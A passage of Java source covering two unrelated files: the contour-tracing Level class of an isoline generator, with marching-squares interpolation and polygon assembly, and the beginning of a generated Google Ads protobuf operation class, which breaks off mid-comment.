domain.x; this.translateY = domain.y; this.gridToCRS = gridToCRS; } /** * Builder of polylines for a single level. The segments to create are determined by a set * of {@linkplain #isDataAbove four flags} (one for each corner) encoded in an integer. * The meaning of those flags is described in Wikipedia "Marching squares" article, * except that this implementation uses different values. */ final class Level { /** * Band number where to read values in the {@link #window} array. */ private final int band; /** * The level value. * * @see #interpolate(int, int) */ final double value; /** * Bitset telling which corners have a value greater than this isoline level {@linkplain #value}. * Each corner is associated to one of the bits illustrated below, where bit (0) is the less significant. * Note that this bit order is different than the order used in Wikipedia "Marching squares" article. * The order used in this class allows more direct bitwise operations as described in next section. * * <pre class="text"> * (0)╌╌╌(1) * ╎ ╎ * (2)╌╌╌(3)</pre> * * Bits are set to 1 where the data value is above the isoline {@linkplain #value}, and 0 where the data value * is below the isoline value. Data values exactly equal to the isoline value are handled as if they were greater. * It does not matter for interpolations: we could flip this convention randomly, the interpolated points would * still be the same. It could change the way line segments are assembled in a single {@link PolylineBuffer}, * but the algorithm stay consistent if we always apply the same rule for all points. * * <h4>Reusing bits from previous iteration</h4> * We will iterate on pixels from left to right, then from top to bottom. With that iteration order, * bits 0 and 2 can be obtained from the bit pattern of previous iteration with a simple bit shift. * * @see #UPPER_LEFT * @see #UPPER_RIGHT * @see #LOWER_LEFT * @see #LOWER_RIGHT */ int isDataAbove; /** * The polyline to be continued on the next column. This is a single instance because iteration happens * from left to right before top to bottom. This instance is non-empty if the cell in previous iteration * was like below (all those examples have a line crossing the right border): * * <pre class="text"> * ●╌╌╌╌╌╌● ○╌╱╌╌╌╌●╱ ○╌╌╌╌╲╌● * ╎ ╎ ╎╱ ╱ ╎ ╲╎ * ─┼──────┼─ ╱ ╱╎ ╎ ╲ * ○╌╌╌╌╌╌○ ╱●╌╌╌╌╱╌○ ○╌╌╌╌╌╌○╲</pre> * * This field {@link PolylineBuffer#isEmpty() is empty} if the cell in previous iteration was like below * (no line cross the right border): * * <pre class="text"> * ○╌╲╌╌╌╌● ○╌╌╌┼╌╌● * ╎ ╲ ╎ ╎ │ ╎ * ╎ ╲ ╎ ╎ │ ╎ * ○╌╌╌╌╲╌● ○╌╌╌┼╌╌●</pre> */ private final PolylineBuffer polylineOnLeft; /** * The polylines in each column which need to be continued on the next row. * This array contains empty instances in columns where there are no polylines to continue on next row. * For non-empty element at index <var>x</var>, values on the left border are given by pixels at coordinate * {@code x} and values on the right border are given by pixels at coordinate {@code x+1}. Example: * * <pre class="text"> * ○╌╌╌╌╌╌●╱ * ╎ Top ╱ * ╎ [x] ╱╎ * ●╌╌╌╌╌╌●╌╌╌╌╱╌○ * ╎ Left ╎██████╎ ← Cell where to create a segment * ─┼──────┼██████╎ * ○╌╌╌╌╌╌○╌╌╌╌╌╌○ * ↑ * x coordinate of first pixel (upper-left corner)</pre> */ private final PolylineBuffer[] polylinesOnTop; /** * Paths that have not yet been closed. The {@link PolylineBuffer} coordinates are copied in this map when * iteration finished on a row but the polyline under construction will not be continued by the next row, * or when the {@link #closeLeftWithTop(PolylineBuffer)} method has been invoked but the geometry to close * is still not complete. This map accumulates those partial shapes for assembling them later when missing * parts become available. * * <h4>Map keys</h4> * Keys are grid coordinates rounded toward 0. The coordinate having fraction digits has its bits inverted * by the {@code ~} operator. For each point, there is at most one coordinate having such fraction digits. * * <h4>Map values</h4> * {@code Fragments} instances are list of {@code double[]} arrays to be concatenated in a single polygon later. * For a given {@code Fragments} list, all {@code double[]} arrays at even indices shall have their points read * in reverse order and all {@code double[]} arrays at odd indices shall have their points read in forward order. * The list may contain null elements when there is no data in the corresponding iteration order. * * @see #closeLeftWithTop(PolylineBuffer) */ private final Map<Point,Fragments> partialPaths; /** * Builder of isolines as a Java2D shape, created when first needed. * The {@link PolylineBuffer} coordinates are copied in this path when a geometry is closed * and transformed using {@link #gridToCRS}. This is almost final result; the only difference * compared to {@link #shape} is that the coordinates are not yet wrapped in a {@link Shape}. * * @see #writeTo(Joiner, PolylineBuffer[], boolean) * @see PolylineStage#FINAL */ private Joiner path; /** * The isolines as a Java2D shape, created by {@link #finish()}. * This is the shape to be returned to user for this level after we finished to process all cells. * * @see PolylineStage#FINAL */ Shape shape; /** * Creates new isoline levels for the given value. * * @param band band number where to read values in the {@link #window} array. * @param value the isoline level value. * @param width the contouring grid cell width (one cell smaller than image width). */ Level(final int band, final double value, final int width) { this.band = band; this.value = value; partialPaths = new HashMap<>(); polylineOnLeft = new PolylineBuffer(); polylinesOnTop = new PolylineBuffer[width]; for (int i=0; i<width; i++) { polylinesOnTop[i] = new PolylineBuffer(); } } /** * Initializes the {@link #isDataAbove} value with values for the column on the right side. * After this method call, the {@link #UPPER_RIGHT} and {@link #LOWER_RIGHT} bits still need to be set. * * @see Isolines#setMaskBit(double, int) */ final void nextColumn() { /* * Move bits on the right side to the left side. * The 1 operand in >>> is the hard-coded value * of log2(UPPER_RIGHT) - log2(UPPER_LEFT) * and log2(LOWER_RIGHT) - log2(LOWER_LEFT). */ isDataAbove = (isDataAbove & (UPPER_RIGHT | LOWER_RIGHT)) >>> 1; } /** * Adds segments computed for values in a single pixel. Interpolations are determined by the 4 lowest bits * of {@link #isDataAbove}. The {@link #polylineOnLeft} and {@code polylinesOnTop[x]} elements are updated * by this method. * * <h4>How NaN values are handled</h4> * This algorithm does not need special attention for {@link Double#NaN} values. Interpolations will produce * {@code NaN} values and append them to the correct polyline (which does not depend on interpolation result) * like real values. Those NaN values will be filtered later in another method, when copying coordinates in * the {@link PathBuilder}. */ @SuppressWarnings("AssertWithSideEffects") final void interpolate() throws TransformException { /* * Note: `interpolateMissingLeftSide()` and `interpolateMissingTopSide(…)` should do interpolations * only for cells in the first column and first row respectively. We could avoid those method calls * for all other cells if we add two flags in the `isDataAbove` bitmask: FIRST_ROW and FIRST_COLUMN. * The switch cases then become something like below: * * case <bitmask> | FIRST_COLUMN | FIRST_ROW: * case <bitmask> | FIRST_COLUMN: { * interpolateMissingLeftSide(); * // Fall through * } * case <bitmask> | FIRST_ROW: * case <bitmask>: { * // Interpolations on other borders. * break; * } * * We tried that approach, but benchmarking on Java 15 suggested a small performance decrease * instead of an improvement. It may be worth to try again in the future, after advancement * in compiler technology. */ switch (isDataAbove) { default: { throw new AssertionError(isDataAbove); // Should never happen. } /* ○╌╌╌╌╌╌○ ●╌╌╌╌╌╌● * ╎ ╎ ╎ ╎ * ╎ ╎ ╎ ╎ * ○╌╌╌╌╌╌○ ●╌╌╌╌╌╌● */ case 0: case UPPER_LEFT | UPPER_RIGHT | LOWER_LEFT | LOWER_RIGHT: { assert polylinesOnTop[x].isEmpty(); assert polylineOnLeft .isEmpty(); break; } /* ○╌╌╌╌╌╌○ ●╌╌╌╌╌╌● * ─┼──────┼─ ─┼──────┼─ * ╎ ╎ ╎ ╎ * ●╌╌╌╌╌╌● ○╌╌╌╌╌╌○ */ case LOWER_LEFT | LOWER_RIGHT: case UPPER_LEFT | UPPER_RIGHT: { assert polylinesOnTop[x].isEmpty(); interpolateMissingLeftSide(); interpolateOnRightSide(); // Will be the left side of next column. break; } /* ○╌╌╌┼╌╌● ●╌╌╌┼╌╌○ * ╎ │ ╎ ╎ │ ╎ * ╎ │ ╎ ╎ │ ╎ * ○╌╌╌┼╌╌● ●╌╌╌┼╌╌○ */ case UPPER_RIGHT | LOWER_RIGHT: case UPPER_LEFT | LOWER_LEFT: { assert polylineOnLeft.isEmpty(); final PolylineBuffer polylineOnTop = polylinesOnTop[x]; interpolateMissingTopSide(polylineOnTop); interpolateOnBottomSide(polylineOnTop); // Will be top side of next row. break; } /* ╲○╌╌╌╌╌╌○ ╲●╌╌╌╌╌╌● * ╲ ╎ ╲ ╎ * ╎╲ ╎ ╎╲ ╎ * ●╌╲╌╌╌╌○ ○╌╲╌╌╌╌● */ case LOWER_LEFT: case UPPER_LEFT | UPPER_RIGHT | LOWER_RIGHT: { assert polylinesOnTop[x].isEmpty(); interpolateMissingLeftSide(); interpolateOnBottomSide(polylinesOnTop[x].transferFrom(polylineOnLeft)); break; } /* ○╌╌╌╌╲╌● ●╌╌╌╌╲╌○ * ╎ ╲╎ ╎ ╲╎ * ╎ ╲ ╎ ╲ * ○╌╌╌╌╌╌○╲ ●╌╌╌╌╌╌●╲ */ case UPPER_RIGHT: case UPPER_LEFT | LOWER_LEFT | LOWER_RIGHT: { assert polylineOnLeft.isEmpty(); interpolateMissingTopSide(polylineOnLeft.transferFrom(polylinesOnTop[x])); interpolateOnRightSide(); break; } /* ○╌╌╌╌╌╌○╱ ●╌╌╌╌╌╌●╱ * ╎ ╱ ╎ ╱ * ╎ ╱╎ ╎ ╱╎ * ○╌╌╌╌╱╌● ●╌╌╌╌╱╌○ */ case LOWER_RIGHT: case UPPER_LEFT | UPPER_RIGHT | LOWER_LEFT: { assert polylinesOnTop[x].isEmpty(); assert polylineOnLeft .isEmpty(); interpolateOnRightSide(); interpolateOnBottomSide(polylinesOnTop[x].attach(polylineOnLeft)); // Bottom of this cell will be top of next row. break; } /* ●╌╱╌╌╌╌○ ○╌╱╌╌╌╌● * ╎╱ ╎ ╎╱ ╎ * ╱ ╎ ╱ ╎ * ╱○╌╌╌╌╌╌○ ╱●╌╌╌╌╌╌● */ case UPPER_LEFT: case UPPER_RIGHT | LOWER_LEFT | LOWER_RIGHT: { closeLeftWithTop(polylinesOnTop[x]); break; } /* ○╌╱╌╌╌╌●╱ ╲●╌╌╌╌╲╌○ * ╎╱ ╱ ╲ ╲╎ * ╱ ╱╎ ╎╲ ╲ * ╱●╌╌╌╌╱╌○ ○╌╲╌╌╌╌●╲ * * Disambiguation of saddle points: use the average data value for the center of the cell. * If the estimated center value is greater than the isoline value, the above drawings are * okay and we do not need to change `isDataAbove`. This is the left side illustrated below. * But if the center value is below isoline value, then we need to flip `isDataAbove` bits * (conceptually; not really because we need to keep `isDataAbove` value for next iteration). * This is the right side illustrated below. * * ○╱╌╌●╱ ╲●╌╌╲○ ╲○╌╌╲● ●╱╌╌○╱ * ╱ ● ╱ ╲ ● ╲ ╲ ○ ╲ ╱ ○ ╱ * ╱●╌╌╱○ ○╲╌╌●╲ ●╲╌╌○╲ ╱○╌╌╱● */ case UPPER_RIGHT | LOWER_LEFT: case UPPER_LEFT | LOWER_RIGHT: { double average = 0; { // Compute sum of 4 corners. final double[] data = window; int p = band; do average += data[p]; while ((p += pixelStride) < data.length); assert (p -= band) == pixelStride * 4 : p; average /= 4; } boolean LLtoUR = isDataAbove == (LOWER_LEFT | UPPER_RIGHT); LLtoUR ^= (average <= value); final PolylineBuffer polylineOnTop = polylinesOnTop[x]; if (LLtoUR) { closeLeftWithTop(polylineOnTop); interpolateOnRightSide(); interpolateOnBottomSide(polylineOnTop.attach(polylineOnLeft)); } else { interpolateMissingLeftSide(); final PolylineBuffer swap = new PolylineBuffer().transferFrom(polylineOnTop); interpolateOnBottomSide(polylineOnTop.transferFrom(polylineOnLeft)); interpolateMissingTopSide(polylineOnLeft.transferFrom(swap)); interpolateOnRightSide(); } break; } } } /** * Appends to {@link #polylineOnLeft} a point interpolated on the left side if that point is missing. * This interpolation should happens only in the first column. */ private void interpolateMissingLeftSide() { if (polylineOnLeft.size == 0) { polylineOnLeft.append(translateX + (x), translateY + (y + interpolate(0, 2*pixelStride))); } } /** * Appends to {@code polylineOnTop} a point interpolated on the top side if that point is missing. * This interpolation should happens only in the first row. */ private void interpolateMissingTopSide(final PolylineBuffer polylineOnTop) { if (polylineOnTop.size == 0) { interpolateOnTopSide(polylineOnTop); } } /** * Appends to the given polyline a point interpolated on the top side. */ private void interpolateOnTopSide(final PolylineBuffer appendTo) { appendTo.append(translateX + (x + interpolate(0, pixelStride)), translateY + (y)); } /** * Appends to {@link #polylineOnLeft} a point interpolated on the right side. * The polyline on right side will become {@code polylineOnLeft} in next column. */ private void interpolateOnRightSide() { polylineOnLeft.append(translateX + (x + 1), translateY + (y + interpolate(pixelStride, 3*pixelStride))); } /** * Appends to the given polyline a point interpolated on the bottom side. * The polyline on top side will become a {@code polylineOnBottoù} in next row. */ private void interpolateOnBottomSide(final PolylineBuffer polylineOnTop) { polylineOnTop.append(translateX + (x + interpolate(2*pixelStride, 3*pixelStride)), translateY + (y + 1)); } /** * Interpolates the position where the isoline passes between two values. * * @param i1 index of first value in the buffer, ignoring band offset. * @param i2 index of second value in the buffer, ignoring band offset. * @return a value interpolated between the values at the two given indices. */ private double interpolate(final int i1, final int i2) { final double[] data = window; final int p = band; final double v1 = data[p + i1]; final double v2 = data[p + i2]; return (value - v1) / (v2 - v1); } /** * Joins {@link #polylineOnLeft} with {@code polylineOnTop}, saves their coordinates * and clear those {@link PolylineBuffer} instances for use in next cell. * The coordinates are written directly to {@link #path} if we got a closed polygon, * or otherwise are saved in {@link #partialPaths} for later processing. * This method is invoked for cells like below: * * <pre class="text"> * ●╌╱╌╌╌╌○ ○╌╱╌╌╌╌● ○╌╱╌╌╌╌●╱ * ╎╱ ╎ ╎╱ ╎ ╎╱ ╱ * ╱ ╎ ╱ ╎ ╱ ╱╎ * ╱○╌╌╌╌╌╌○ ╱●╌╌╌╌╌╌● ╱●╌╌╌╌╱╌○</pre> * * This method does itself the interpolations on left side and top side. The two polylines * {@link #polylineOnLeft} and {@code polylineOnTop} will become empty after this method call. * * @param polylineOnTop value of {@code polylinesOnTop[x]}. * @throws TransformException if the {@link Tracer#gridToCRS} transform cannot be applied. */ private void closeLeftWithTop(final PolylineBuffer polylineOnTop) throws TransformException { interpolateMissingLeftSide(); interpolateMissingTopSide(polylineOnTop); final PolylineBuffer[] polylines; if (polylineOnLeft.opposite == polylineOnTop) { assert polylineOnTop.opposite == polylineOnLeft; /* * We have a loop: the polygon can be closed now, without copying coordinates to temporary buffers. * Points in `PolylineBuffer` instances will be iterated in (reverse, forward) order respectively. * Consequently, the points we just interpolated will be first point and last point before closing. */ polylines = new PolylineBuffer[] {polylineOnTop, polylineOnLeft}; // (reverse, forward) point order. } else { /* * Joining left and top polylines do not yet create a closed shape. Consequently, we may not write * in the `path` now. But maybe we can close the polygon later after more polylines are attached. */ final Fragments fragment = new Fragments(polylineOnLeft, polylineOnTop); if (fragment.isEmpty()) { /* * Fragment starts and ends with NaN values. We will not be able to complete a polygon. * Better to write the polylines now for avoiding temporary copies of their coordinates. */ polylines = new PolylineBuffer[] { polylineOnLeft.opposite, polylineOnLeft, polylineOnTop, polylineOnTop.opposite }; } else if (fragment.addOrMerge(partialPaths)) { /* * The fragment has been merged with previously existing fragments and became a polygon. * We can write the polygon immediately. There are no more references to those coordinates * in the `partialPaths` map. */ polylines = fragment.toPolylines(); } else { return; } } path = writeTo(path, polylines, true); } /** * Writes the content of given polyline without closing it as a polygon. * The given polyline will become empty after this method call. */ private void writeFragment(final PolylineBuffer polyline) throws TransformException { final Fragments fragment = new Fragments(polyline, null); final PolylineBuffer[] polylines; final boolean close; if (fragment.isEmpty()) { close = false; polylines = new PolylineBuffer[] {polyline.opposite, polyline}; // (reverse, forward) point order. } else { close = fragment.addOrMerge(partialPaths); if (!close) { // Keep in `partialPaths`. Maybe it can be closed later. return; } polylines = fragment.toPolylines(); } path = writeTo(path, polylines, close); } /** * Invoked after iteration on a single row has been completed. If there is a polyline * finishing on the right image border, the coordinates needs to be saved somewhere * because that {@link PolylineBuffer} will not be continued by cells on next rows. */ final void finishedRow() throws TransformException { if (!polylineOnLeft.transferToOpposite()) { writeFragment(polylineOnLeft); } isDataAbove = 0; } /** * Invoked after the iteration has been completed on the full area of interest. * This method writes all remaining polylines to {@link #partialPaths}. * It assumes that {@link #finishedRow()} has already been invoked. * This {@link Level} instance cannot be used anymore after this call. */ final void finish() throws TransformException { assert polylineOnLeft.isEmpty(); polylineOnLeft.coordinates = null; /* * This method sets various values to null for letting the garbage collector do its work. * This is okay for a `Level` instance which is not going to be used anymore, except for * reading the `shape` field. */ for (int i=0; i < polylinesOnTop.length; i++) { writeFragment(polylinesOnTop[i]); polylinesOnTop[i] = null; } assert isConsistent(); } /** * Verifies that {@link #partialPaths} consistency. Used for assertions only. */ private boolean isConsistent() { for (final Map.Entry<Point,Fragments> entry : partialPaths.entrySet()) { if (!entry.getValue().isExtremity(entry.getKey())) return false; } return true; } /** * Transfers all {@code other} polylines into this instance. The {@code other} instance should be a neighbor, * i.e. an instance sharing a border with this instance. The {@code other} instance will become empty after * this method call. * * @param other a neighbor level (on top, left, right or bottom) to merge with this level. * @throws TransformException if an error occurred during polylines creation. */ final void merge(final Level other) throws TransformException { assert other != this && other.value == value; if (path == null) { path = other.path; } else { path.append(other.path); } other.path = null; assert this.isConsistent(); assert other.isConsistent(); final IdentityHashMap<Fragments,Boolean> done = new IdentityHashMap<>(other.partialPaths.size() / 2); for (final Map.Entry<Point,Fragments> entry : other.partialPaths.entrySet()) { final Fragments fragment = entry.getValue(); if (done.put(fragment, Boolean.TRUE) == null) { assert fragment.isExtremity(entry.getKey()); if (fragment.addOrMerge(partialPaths)) { path = writeTo(path, fragment.toPolylines(), true); fragment.clear(); } } entry.setValue(null); // Let the garbage collector do its work. } } /** * Flushes any pending {@link #partialPaths} to {@link #path}. This method is invoked after * {@link #finish()} has been invoked for all sub-regions (many sub-regions may exist if * isoline generation has been split for parallel computation). * * @throws TransformException if an error occurred during polylines creation. */ final void flush() throws TransformException { for (final Map.Entry<Point,Fragments> entry : partialPaths.entrySet()) { final Fragments fragment = entry.getValue(); assert fragment.isExtremity(entry.getKey()); if (!fragment.isEmpty()) { path = writeTo(path, fragment.toPolylines(), false); fragment.clear(); // Necessary because the same list appears twice in the map. } entry.setValue(null); // Let the garbage collector do its work. } if (path != null) { shape = path.build(); path = null; } } /** * Appends the pixel coordinates of this level to the given path, for debugging purposes only. * The {@link #gridToCRS} transform is <em>not</em> applied by this method. * For avoiding confusing behavior, that transform should be null. * * @param appendTo where to append the coordinates. * * @see Isolines#toRawPath() */ @Debug final void toRawPath(final Map<PolylineStage,Path2D> appendTo) { PolylineStage.FINAL.add(appendTo, (path != null) ? path.snapshot() : shape); PolylineStage.FRAGMENT.add(appendTo, partialPaths); polylineOnLeft.toRawPath(appendTo); for (final PolylineBuffer p : polylinesOnTop) { if (p != null) p.toRawPath(appendTo); } } } /** * Writes all given polylines to the specified path builder. Null {@code PolylineBuffer} instances are ignored. * {@code PolylineBuffer} instances at even index are written with their points in reverse order. * All given polylines are cleared by this method. * * @param path where to write the polylines, or {@code null} if not yet created. * @param polylines the polylines to write. * @param close whether to close the polygon. * @return the given path builder, or a newly created builder if the argument was null. * @throws TransformException if the {@link #gridToCRS} transform cannot be applied. */ private Joiner writeTo(Joiner path, final PolylineBuffer[] polylines, final boolean close) throws TransformException { for (int pi=0; pi < polylines.length; pi++) { final PolylineBuffer p = polylines[pi]; if (p == null) { continue; } final int size = p.size; if (size == 0) { assert p.isEmpty(); continue; } if (path == null) { path = new Joiner(gridToCRS); } path.append(p.coordinates, size, (pi & 1) == 0); p.clear(); } if (path != null) { path.createPolyline(close); } return path; } }
googleads/google-ads-java
35,915
google-ads-stubs-v19/src/main/java/com/google/ads/googleads/v19/services/AdGroupCriterionCustomizerOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v19/services/ad_group_criterion_customizer_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v19.services; /** * <pre> * A single operation (create, remove) on a customizer attribute. * </pre> * * Protobuf type {@code google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation} */ public final class AdGroupCriterionCustomizerOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation) AdGroupCriterionCustomizerOperationOrBuilder { private static final long serialVersionUID = 0L; // Use AdGroupCriterionCustomizerOperation.newBuilder() to construct. private AdGroupCriterionCustomizerOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private AdGroupCriterionCustomizerOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new AdGroupCriterionCustomizerOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v19_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v19_services_AdGroupCriterionCustomizerOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation.class, com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation.Builder.class); } private int operationCase_ = 0; @SuppressWarnings("serial") private java.lang.Object operation_; public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { CREATE(1), REMOVE(2), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return CREATE; case 2: return REMOVE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int CREATE_FIELD_NUMBER = 1; /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> * @return Whether the create field is set. */ @java.lang.Override public boolean hasCreate() { return operationCase_ == 1; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> * @return The create. */ @java.lang.Override public com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer getCreate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizerOrBuilder getCreateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } public static final int REMOVE_FIELD_NUMBER = 2; /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return Whether the remove field is set. */ public boolean hasRemove() { return operationCase_ == 2; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The remove. */ public java.lang.String getRemove() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); if (operationCase_ == 2) { operation_ = s; } return s; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The bytes for remove. */ public com.google.protobuf.ByteString getRemoveBytes() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); if (operationCase_ == 2) { operation_ = b; } return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_); } if (operationCase_ == 2) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, operation_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_); } if (operationCase_ == 2) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, operation_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation)) { return super.equals(obj); } com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation other = (com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation) obj; if (!getOperationCase().equals(other.getOperationCase())) return false; switch (operationCase_) { case 1: if (!getCreate() .equals(other.getCreate())) return false; break; case 2: if (!getRemove() .equals(other.getRemove())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); switch (operationCase_) { case 1: hash = (37 * hash) + CREATE_FIELD_NUMBER; hash = (53 * hash) + getCreate().hashCode(); break; case 2: hash = (37 * hash) + REMOVE_FIELD_NUMBER; hash = (53 * hash) + getRemove().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (create, remove) on a customizer attribute. * </pre> * * Protobuf type {@code 